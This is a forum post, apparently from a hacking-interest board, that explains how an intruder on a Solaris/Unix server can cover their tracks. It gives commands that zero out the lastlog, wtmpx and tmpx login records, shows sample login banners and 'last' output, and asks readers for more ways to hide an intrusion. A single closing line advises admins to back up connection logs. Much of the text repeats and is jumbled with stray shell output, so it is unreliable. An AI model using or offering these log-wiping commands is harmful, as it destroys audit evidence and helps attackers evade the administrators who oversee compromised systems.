SnEafer
Senior Member
- Apr 1, 2009
- 154
- 3
I read this article posted by anton ***i think **** and some how he mentioned few tricks to know when someone has haxed your system,
Well he did said said few tricks a haxer could use but i think he wasn't aware of the trick that i'll show below : -
Here are some ways of covering your fingerprints on a server using the files that monitors user logins. ***in linux/unix***.
We want to erase any trace that will show that we were inside the box. In doing so well just:
Clear out the last log file if youre using an existing user from the box. Lastlogin file shows when and where a particular user last login from.
(first login)
If you want to check those users who logged in to a Unix box, type in last
That is a lot of information, so in covering up your track, delete or zero out the files that stores these information
Of course doing these is like shouting and telling the whole universe that you were there.
These are just a few to cover you track Do you have any additions? Or any tips in covering the intrusion without knowing that you were there?
**********************
For admins : -
Making a copy of every connection on a cd (burning) is very hard for a haxer to temper with those data.
But remember not all admins do that ;-)
Well he did said said few tricks a haxer could use but i think he wasn't aware of the trick that i'll show below : -
Here are some ways of covering your fingerprints on a server using the files that monitors user logins. ***in linux/unix***.
We want to erase any trace that will show that we were inside the box. In doing so well just:
cat /dev/null > <file>
Lastlog file
Clear out the last log file if youre using an existing user from the box. Lastlogin file shows when and where a particular user last login from.
login: razile
Password:
Last login: Fri Oct 21 21:50:02 2007 from 210.2.9.1
Sun Microsystems Inc. SunOS 5.9 Generic May 2002
razile@unix-box %
Erase that if you dont want the admin see where you last login from (IP, hostname, time etc)Password:
Last login: Fri Oct 21 21:50:02 2007 from 210.2.9.1
Sun Microsystems Inc. SunOS 5.9 Generic May 2002
razile@unix-box %
cat /dev/null > /var/adm/lastlogin
After clearing the lastlog file, comparing the first login and the second one:
(first login)
Last login: Thu Nov 1 21:33:41 2007 from 210.23.109.1
Sun Microsystems Inc. SunOS 5.9 Generic May 2002
user@server->
(after deletion)Sun Microsystems Inc. SunOS 5.9 Generic May 2002
user@server->
Sun Microsystems Inc. SunOS 5.9 Generic May 2002
bash: unalias: `e: not an alias
user@server->
wtmpx/tmpx filesbash: unalias: `e: not an alias
user@server->
If you want to check those users who logged in to a Unix box, type in last
UnixBox# last | more
root pts/21 101.221.224.61 Sat Nov 3 11:38 still logged in
sitescp pts/20 19.168.128.132 Sat Nov 3 07:00 still logged in
root pts/23 101.221.224.51 Sat Nov 3 05:05 still logged in
root pts/22 101.221.224.51 Sat Nov 3 05:05 still logged in
paladel pts/22 14.122.4.99 Fri Nov 2 14:33 - 15:32 (00:59)
boy1 pts/26 14.122.4.67 Fri Nov 2 13:22 - 14:50 (01:28)
boy2 pts/26 14.122.4.67 Fri Nov 2 13:20 - 13:22 (00:02)
Youll see the user who was logged in, the terminal used, the IP where he came from the date or duration of his activity in the server.root pts/21 101.221.224.61 Sat Nov 3 11:38 still logged in
sitescp pts/20 19.168.128.132 Sat Nov 3 07:00 still logged in
root pts/23 101.221.224.51 Sat Nov 3 05:05 still logged in
root pts/22 101.221.224.51 Sat Nov 3 05:05 still logged in
paladel pts/22 14.122.4.99 Fri Nov 2 14:33 - 15:32 (00:59)
boy1 pts/26 14.122.4.67 Fri Nov 2 13:22 - 14:50 (01:28)
boy2 pts/26 14.122.4.67 Fri Nov 2 13:20 - 13:22 (00:02)
That is a lot of information, so in covering up your track, delete or zero out the files that stores these information
cat /dev/null > /var/adm/wtmpx
cat /dev/null > /var/adm/tmpx
After doing so, youll get this when doing lastcat /dev/null > /var/adm/tmpx
# cat /dev/null > /var/adm/wtmpx
# last | more
wtmp begins Sun Nov 4 00:41
#
You could also zero out the /var/adm/messages if youre really paranoid.# last | more
wtmp begins Sun Nov 4 00:41
#
Of course doing these is like shouting and telling the whole universe that you were there.
These are just a few to cover you track Do you have any additions? Or any tips in covering the intrusion without knowing that you were there?
**********************
For admins : -
Making a copy of every connection on a cd (burning) is very hard for a haxer to temper with those data.
But remember not all admins do that ;-)